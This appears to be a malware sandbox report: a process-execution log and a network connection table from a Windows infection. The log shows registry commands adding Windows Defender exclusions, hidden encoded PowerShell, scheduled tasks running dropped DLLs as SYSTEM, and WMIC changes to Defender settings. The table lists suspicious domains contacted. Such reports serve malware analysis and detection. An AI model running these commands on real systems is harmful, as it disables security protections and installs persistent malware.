"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ezMWJXFFLyUn" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hMiQKFvmPLjeC" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hMiQKFvmPLjeC" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\CSlqozbqXBZGgaVB /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\CSlqozbqXBZGgaVB /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\DMGDvKLKeLwsjNbUi /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\DMGDvKLKeLwsjNbUi /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\wqgwJMWXAwfbGfvq /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\wqgwJMWXAwfbGfvq /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gICjdiRSO" /SC once /ST 10:50:20 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gICjdiRSO"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
C:\Windows\system32\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gICjdiRSO"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "FPIEUdZLMYPzsiUNM" /SC once /ST 11:32:58 /RU "SYSTEM" /TR "\"C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\iysZwBe.exe\" Wy /BExididMQ 757674 /S" /V1 /F
C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "FPIEUdZLMYPzsiUNM"
C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\iysZwBe.exe
C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\iysZwBe.exe Wy /BExididMQ 757674 /S
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 2996 -ip 2996
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2996 -s 908
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "bEtnHIcecDUtXwQuWS"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"
C:\Windows\SysWOW64\cmd.exe
/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\UQtSSXvqU\dVmANv.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "OcPshDNvhDnVmSv" /V1 /F
C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "OcPshDNvhDnVmSv2" /F /xml "C:\Program Files (x86)\UQtSSXvqU\SBIkhNc.xml" /RU "SYSTEM"
C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "OcPshDNvhDnVmSv"
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "OcPshDNvhDnVmSv"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "qjEkZtbojbmFFd" /F /xml "C:\Program Files (x86)\AMqhlrBDqRJU2\FnlJVMA.xml" /RU "SYSTEM"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "SzzOVfCIijTTD2" /F /xml "C:\ProgramData\CSlqozbqXBZGgaVB\Mpmbkxe.xml" /RU "SYSTEM"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "PiigmmnlzELKpVpJK2" /F /xml "C:\Program Files (x86)\OJBbginKvssDnbEKbsR\izrRiZa.xml" /RU "SYSTEM"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "XrMInsNlrWTcBhRONQr2" /F /xml "C:\Program Files (x86)\hMiQKFvmPLjeC\wpsSjdR.xml" /RU "SYSTEM"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 964 -ip 964
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 964 -s 1964
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "MRTHivZIQsRdEanwm" /SC once /ST 02:53:11 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\wqgwJMWXAwfbGfvq\BliLFRQi\dtsjWWz.dll\",#1 /yUAdidtcar 757674" /V1 /F
C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "MRTHivZIQsRdEanwm"
C:\Windows\system32\rundll32.EXE
C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\wqgwJMWXAwfbGfvq\BliLFRQi\dtsjWWz.dll",#1 /yUAdidtcar 757674
C:\Windows\SysWOW64\rundll32.exe
C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\wqgwJMWXAwfbGfvq\BliLFRQi\dtsjWWz.dll",#1 /yUAdidtcar 757674
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 964 -ip 964
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 964 -s 2132
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "YAAFs1" /SC once /ST 15:24:21 /F /RU "Admin" /TR "\"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe\" --restore-last-session"
C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "YAAFs1"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --restore-last-session
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 964 -ip 964
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 964 -s 2280
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffae50a46f8,0x7ffae50a4708,0x7ffae50a4718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2036,12261988785608004724,6702640044397299464,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2252 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2036,12261988785608004724,6702640044397299464,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2304 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2036,12261988785608004724,6702640044397299464,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2740 /prefetch:8
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "MRTHivZIQsRdEanwm"
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,12261988785608004724,6702640044397299464,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3852 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,12261988785608004724,6702640044397299464,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3864 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,12261988785608004724,6702640044397299464,131072 --lang=en-US --extension-process --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4312 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,12261988785608004724,6702640044397299464,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4572 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,12261988785608004724,6702640044397299464,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5364 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,12261988785608004724,6702640044397299464,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5308 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,12261988785608004724,6702640044397299464,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4504 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2036,12261988785608004724,6702640044397299464,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6004 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2036,12261988785608004724,6702640044397299464,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6004 /prefetch:8
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "YAAFs1"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,12261988785608004724,6702640044397299464,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6216 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,12261988785608004724,6702640044397299464,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6248 /prefetch:1
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "FPIEUdZLMYPzsiUNM"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 4956 -ip 4956
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4956 -s 1240
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 2728 -ip 2728
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2728 -s 2212
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,12261988785608004724,6702640044397299464,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3172 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,12261988785608004724,6702640044397299464,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6488 /prefetch:1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | ify.ac | udp |
| US | 104.21.23.148:443 | ify.ac | tcp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | oasqi.nxt-psh.com | udp |
| US | 8.8.8.8:53 | 148.23.21.104.in-addr.arpa | udp |
| US | 172.67.194.119:443 | oasqi.nxt-psh.com | tcp |
| US | 8.8.8.8:53 | mc.yandex.ru | udp |
| RU | 87.250.250.119:443 | mc.yandex.ru | tcp |
| US | 8.8.8.8:53 | nxt-psh.com | udp |
| US | 8.8.8.8:53 | 20.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 119.194.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 119.250.250.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 74.204.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | mc.yandex.com | udp |
| US | 8.8.8.8:53 | 99.201.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 227.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 13.107.21.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 237.21.107.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.156.103.20.in-addr.arpa | udp |
| N/A | 224.0.0.251:5353 | udp | |
| US | 8.8.8.8:53 | client.wns.windows.com | udp |
| GB | 20.90.153.243:443 | client.wns.windows.com | tcp |
| US | 8.8.8.8:53 | fcmregistrations.googleapis.com | udp |
| US | 8.8.8.8:53 | 243.153.90.20.in-addr.arpa | udp |
| US | 104.21.20.211:443 | nxt-psh.com | tcp |
| US | 8.8.8.8:53 | static.imghst-de.com | udp |
| US | 8.8.8.8:53 | jpgtrk.imghst-de.com | udp |
| US | 104.26.3.30:443 | jpgtrk.imghst-de.com | tcp |
| US | 104.26.3.30:443 | jpgtrk.imghst-de.com | tcp |
| US | 104.26.3.30:443 | jpgtrk.imghst-de.com | tcp |
| US | 8.8.8.8:53 | trk.imghst-de.com | udp |
| US | 8.8.8.8:53 | 30.3.26.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 211.20.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 147.142.123.92.in-addr.arpa | udp |
| US | 8.8.8.8:53 | soneremonasez.shop | udp |
| US | 172.67.180.145:443 | soneremonasez.shop | tcp |
| US | 172.67.180.145:443 | soneremonasez.shop | tcp |
| US | 8.8.8.8:53 | apps.identrust.com | udp |
| GB | 92.123.143.169:80 | apps.identrust.com | tcp |
| US | 8.8.8.8:53 | 145.180.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | google.com | udp |
| US | 8.8.8.8:53 | cdnjs.cloudflare.com | udp |
| GB | 142.250.200.46:443 | google.com | tcp |
| US | 104.17.25.14:443 | cdnjs.cloudflare.com | tcp |
| US | 104.17.25.14:443 | cdnjs.cloudflare.com | tcp |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 142.250.180.4:443 | www.google.com | tcp |
| US | 8.8.8.8:53 | 169.143.123.92.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 46.200.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.25.17.104.in-addr.arpa | udp |
| GB | 142.250.180.4:443 | www.google.com | udp |
| US | 8.8.8.8:53 | 4.180.250.142.in-addr.arpa | udp |
| GB | 142.250.180.4:443 | www.google.com | udp |
| GB | 142.250.200.46:443 | google.com | udp |
| US | 8.8.8.8:53 | a.nel.cloudflare.com | udp |
| US | 35.190.80.1:443 | a.nel.cloudflare.com | tcp |
| US | 35.190.80.1:443 | a.nel.cloudflare.com | udp |
| US | 8.8.8.8:53 | 1.80.190.35.in-addr.arpa | udp |
| US | 8.8.8.8:53 | senzamenuzaes.shop | udp |
| US | 172.67.138.9:443 | senzamenuzaes.shop | tcp |
| US | 8.8.8.8:53 | 9.138.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.144.22.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
| US | 35.190.80.1:443 | a.nel.cloudflare.com | udp |
| US | 8.8.8.8:53 | soneservice.shop | udp |
| US | 104.21.74.224:80 | soneservice.shop | tcp |
| US | 8.8.8.8:53 | 224.74.21.104.in-addr.arpa | udp |
| US | 104.21.74.224:80 | soneservice.shop | tcp |
| US | 8.8.8.8:53 | t.me | udp |
| NL | 149.154.167.99:443 | t.me | tcp |
| US | 8.8.8.8:53 | 5.173.189.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 99.167.154.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | t.me | udp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| US | 8.8.8.8:53 | telegram.org | udp |
| US | 8.8.8.8:53 | cdn5.cdn-telegram.org | udp |
| NL | 149.154.167.99:443 | telegram.org | tcp |
| NL | 149.154.167.99:443 | telegram.org | tcp |
| NL | 149.154.167.99:443 | telegram.org | tcp |
| NL | 149.154.167.99:443 | telegram.org | tcp |
| US | 34.111.108.175:443 | cdn5.cdn-telegram.org | tcp |
| NL | 149.154.167.99:443 | telegram.org | tcp |
| US | 34.111.108.175:443 | cdn5.cdn-telegram.org | tcp |
| NL | 149.154.167.99:443 | telegram.org | tcp |
| US | 8.8.8.8:53 | 175.108.111.34.in-addr.arpa | udp |
| US | 104.21.74.224:80 | soneservice.shop | tcp |
| US | 104.21.74.224:80 | soneservice.shop | tcp |
| US | 104.21.74.224:80 | soneservice.shop | tcp |
| US | 8.8.8.8:53 | z3n.mom | udp |
| US | 104.21.73.21:443 | z3n.mom | tcp |
| US | 8.8.8.8:53 | net.geo.opera.com | udp |
| NL | 185.26.182.112:443 | net.geo.opera.com | tcp |
| RU | 95.163.241.63:80 | 95.163.241.63 | tcp |
| US | 104.21.74.224:80 | soneservice.shop | tcp |
| US | 8.8.8.8:53 | 21.73.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | slatevision.org | udp |
| US | 104.21.74.224:80 | soneservice.shop | tcp |
| US | 198.54.117.242:443 | slatevision.org | tcp |
| US | 8.8.8.8:53 | 112.182.26.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 63.241.163.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 242.117.54.198.in-addr.arpa | udp |
| US | 104.21.74.224:80 | soneservice.shop | tcp |
| US | 104.21.74.224:80 | soneservice.shop | tcp |
| US | 198.54.117.242:443 | slatevision.org | tcp |
| US | 104.21.74.224:80 | soneservice.shop | tcp |
| US | 104.21.74.224:80 | soneservice.shop | tcp |
| US | 198.54.117.242:443 | slatevision.org | tcp |
| US | 104.21.74.224:80 | soneservice.shop | tcp |
| US | 198.54.117.242:443 | slatevision.org | tcp |
| US | 104.21.74.224:80 | soneservice.shop | tcp |
| US | 104.21.74.224:80 | soneservice.shop | tcp |
| US | 8.8.8.8:53 | desktop-netinstaller-sub.osp.opera.software | udp |
| US | 8.8.8.8:53 | autoupdate.geo.opera.com | udp |
| NL | 185.26.182.124:443 | autoupdate.geo.opera.com | tcp |
| NL | 185.26.182.124:443 | autoupdate.geo.opera.com | tcp |
| NL | 82.145.217.121:443 | desktop-netinstaller-sub.osp.opera.software | tcp |
| US | 8.8.8.8:53 | 124.182.26.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 121.217.145.82.in-addr.arpa | udp |
| US | 8.8.8.8:53 | features.opera-api2.com | udp |
| US | 8.8.8.8:53 | download.opera.com | udp |
| NL | 82.145.216.24:443 | download.opera.com | tcp |
| NL | 185.26.182.93:443 | features.opera-api2.com | tcp |
| US | 8.8.8.8:53 | download5.operacdn.com | udp |
| US | 104.18.10.89:443 | download5.operacdn.com | tcp |
| US | 8.8.8.8:53 | 24.216.145.82.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 93.182.26.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 89.10.18.104.in-addr.arpa | udp |
| NL | 82.145.217.121:443 | desktop-netinstaller-sub.osp.opera.software | tcp |
| US | 8.8.8.8:53 | service-domain.xyz | udp |
| US | 54.210.117.250:443 | service-domain.xyz | tcp |
| US | 8.8.8.8:53 | 168.245.100.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 250.117.210.54.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 89.134.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 10.213.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| GB | 216.58.201.99:80 | c.pki.goog | tcp |
| US | 8.8.8.8:53 | o.pki.goog | udp |
| GB | 216.58.201.99:80 | o.pki.goog | tcp |
| US | 8.8.8.8:53 | clients2.google.com | udp |
| GB | 142.250.200.14:443 | clients2.google.com | tcp |
| US | 8.8.8.8:53 | clients2.googleusercontent.com | udp |
| GB | 142.250.187.225:443 | clients2.googleusercontent.com | tcp |
| US | 8.8.8.8:53 | 14.200.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 225.187.250.142.in-addr.arpa | udp |
| GB | 142.250.200.14:443 | clients2.google.com | tcp |
| US | 8.8.8.8:53 | soneservice.shop | udp |
| US | 172.67.164.12:80 | soneservice.shop | tcp |
| US | 8.8.8.8:53 | 12.164.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api5.check-data.xyz | udp |
| US | 44.240.96.128:80 | api5.check-data.xyz | tcp |
| US | 8.8.8.8:53 | 128.96.240.44.in-addr.arpa | udp |
| US | 8.8.8.8:53 | t.me | udp |
| NL | 149.154.167.99:443 | t.me | tcp |
| US | 8.8.8.8:53 | ify.ac | udp |
| US | 172.67.211.171:443 | ify.ac | tcp |
| US | 8.8.8.8:53 | api2.check-data.xyz | udp |
| US | 8.8.8.8:53 | www.rapidfilestorage.com | udp |
| US | 44.237.52.63:443 | api2.check-data.xyz | tcp |
| US | 8.8.8.8:53 | 234.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.211.67.172.in-addr.arpa | udp |
